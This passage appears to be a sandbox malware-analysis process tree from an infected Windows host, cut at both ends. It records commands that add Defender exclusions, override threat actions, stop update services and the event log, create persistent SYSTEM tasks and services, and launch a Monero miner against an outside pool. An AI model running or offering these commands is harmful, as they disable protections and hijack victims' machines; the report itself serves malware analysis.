                                                                          PID:4252
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                            11⤵
                                                                              PID:4168
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                12⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5296
                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                  13⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1388
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 10:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD6.tmp\Install.exe\" it /QwKdidIflG 385118 /S" /V1 /F
                                                                            10⤵
                                                                            • Drops file in Windows directory
                                                                            • Creates scheduled task(s)
                                                                            PID:4248
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                            10⤵
                                                                              PID:5420
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                11⤵
                                                                                  PID:3244
                                                                                  • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                    schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                    12⤵
                                                                                      PID:3196
                                                                            • C:\Users\Admin\Pictures\8TpUvL7kn5H4TVt2wOzVvh2H.exe
                                                                              "C:\Users\Admin\Pictures\8TpUvL7kn5H4TVt2wOzVvh2H.exe"
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Drops file in System32 directory
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:6100
                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                9⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1900
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                9⤵
                                                                                  PID:1604
                                                                                  • C:\Windows\system32\wusa.exe
                                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                                    10⤵
                                                                                      PID:4848
                                                                                  • C:\Windows\system32\sc.exe
                                                                                    C:\Windows\system32\sc.exe stop UsoSvc
                                                                                    9⤵
                                                                                    • Launches sc.exe
                                                                                    PID:4436
                                                                                  • C:\Windows\system32\sc.exe
                                                                                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                    9⤵
                                                                                    • Launches sc.exe
                                                                                    PID:5256
                                                                                  • C:\Windows\system32\sc.exe
                                                                                    C:\Windows\system32\sc.exe stop wuauserv
                                                                                    9⤵
                                                                                    • Launches sc.exe
                                                                                    PID:4328
                                                                                  • C:\Windows\system32\sc.exe
                                                                                    C:\Windows\system32\sc.exe stop bits
                                                                                    9⤵
                                                                                    • Launches sc.exe
                                                                                    PID:3788
                                                                                  • C:\Windows\system32\sc.exe
                                                                                    C:\Windows\system32\sc.exe stop dosvc
                                                                                    9⤵
                                                                                    • Launches sc.exe
                                                                                    PID:4968
                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                    9⤵
                                                                                      PID:5788
                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                      9⤵
                                                                                        PID:5904
                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                        9⤵
                                                                                          PID:3556
                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                          9⤵
                                                                                            PID:5112
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                                            9⤵
                                                                                            • Launches sc.exe
                                                                                            PID:1436
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                                                            9⤵
                                                                                            • Launches sc.exe
                                                                                            PID:5604
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe stop eventlog
                                                                                            9⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4104
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                                            9⤵
                                                                                            • Launches sc.exe
                                                                                            PID:5296
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              10⤵
                                                                                                PID:5492
                                                                                          • C:\Users\Admin\Pictures\GArsiplQx1Da2WlD9Ohe56UW.exe
                                                                                            "C:\Users\Admin\Pictures\GArsiplQx1Da2WlD9Ohe56UW.exe"
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5652
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS20F1.tmp\Install.exe
                                                                                              .\Install.exe /tEdidDDf "385118" /S
                                                                                              9⤵
                                                                                              • Checks BIOS information in registry
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Enumerates system info in registry
                                                                                              PID:6092
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                10⤵
                                                                                                  PID:5084
                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                    11⤵
                                                                                                      PID:3380
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                        12⤵
                                                                                                          PID:3088
                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                            13⤵
                                                                                                              PID:1384
                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                          11⤵
                                                                                                            PID:2396
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                              12⤵
                                                                                                                PID:1656
                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                  13⤵
                                                                                                                    PID:3828
                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                11⤵
                                                                                                                  PID:1388
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                    12⤵
                                                                                                                      PID:1228
                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                        13⤵
                                                                                                                          PID:5376
                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                      11⤵
                                                                                                                        PID:4808
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                          12⤵
                                                                                                                            PID:6088
                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                              13⤵
                                                                                                                                PID:5780
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                            11⤵
                                                                                                                              PID:6116
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                12⤵
                                                                                                                                  PID:1244
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                    13⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:5972
                                                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                      14⤵
                                                                                                                                        PID:2372
                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                10⤵
                                                                                                                                  PID:5168
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                    11⤵
                                                                                                                                      PID:732
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                        12⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        PID:2240
                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                          13⤵
                                                                                                                                            PID:4020
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 10:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS20F1.tmp\Install.exe\" it /WDididAMUT 385118 /S" /V1 /F
                                                                                                                                      10⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3192
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                                                                      10⤵
                                                                                                                                        PID:4436
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                          11⤵
                                                                                                                                            PID:644
                                                                                                                                            • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                                                              12⤵
                                                                                                                                                PID:2268
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                                                                                      7⤵
                                                                                                                                        PID:6000
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4308
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                                                                                                                                      6⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:1544
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:5404
                                                                                                                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                        7⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:5920
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                        7⤵
                                                                                                                                          PID:5516
                                                                                                                                          • C:\Windows\system32\wusa.exe
                                                                                                                                            wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                            8⤵
                                                                                                                                              PID:1444
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                            7⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:3044
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                            7⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:1640
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                            7⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:5212
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop bits
                                                                                                                                            7⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:1288
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                            7⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:5920
                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                            7⤵
                                                                                                                                              PID:3196
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                              7⤵
                                                                                                                                                PID:408
                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                7⤵
                                                                                                                                                  PID:1016
                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    8⤵
                                                                                                                                                      PID:1656
                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                    7⤵
                                                                                                                                                      PID:2104
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      C:\Windows\system32\sc.exe delete "WSNKISKT"
                                                                                                                                                      7⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:2944
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                                                                                                                                      7⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:4332
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                      7⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:1884
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      C:\Windows\system32\sc.exe start "WSNKISKT"
                                                                                                                                                      7⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:1052
                                                                                                                                            • C:\Users\Admin\1000006002\0df4d6887b.exe
                                                                                                                                              "C:\Users\Admin\1000006002\0df4d6887b.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              PID:4964
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2276 -ip 2276
                                                                                                                                          1⤵
                                                                                                                                            PID:4136
                                                                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                            "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3332
                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                              "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3696
                                                                                                                                              • C:\Windows\Temp\235700.exe
                                                                                                                                                "C:\Windows\Temp\235700.exe" --list-devices
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                PID:4136
                                                                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                            "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4700
                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                              "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3704
                                                                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                            "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3200
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              2⤵
                                                                                                                                                PID:1544
                                                                                                                                              • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                                "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4424
                                                                                                                                                • C:\Windows\Temp\427288.exe
                                                                                                                                                  "C:\Windows\Temp\427288.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  PID:5172
                                                                                                                                                • C:\Windows\Temp\505575.exe
                                                                                                                                                  "C:\Windows\Temp\505575.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  PID:5820
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                              1⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              PID:6136
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                              1⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:1764
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                              1⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5448
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                              1⤵
                                                                                                                                                PID:2156
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                1⤵
                                                                                                                                                  PID:2708
                                                                                                                                                • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                  C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3116
                                                                                                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                      2⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      PID:3748
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3448
                                                                                                                                                        • C:\Windows\system32\wusa.exe
                                                                                                                                                          wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                          3⤵
                                                                                                                                                            PID:5776
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                          2⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:5160
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                          2⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:4528
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                          2⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:4944
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe stop bits
                                                                                                                                                          2⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:520
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                          2⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:4928
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                          2⤵
                                                                                                                                                            PID:5216
                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5084
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4332
                                                                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3476
                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5776
                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                    C:\Windows\system32\conhost.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1056
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:3244
                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:4168
                                                                                                                                                                        • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                                          "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5896
                                                                                                                                                                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
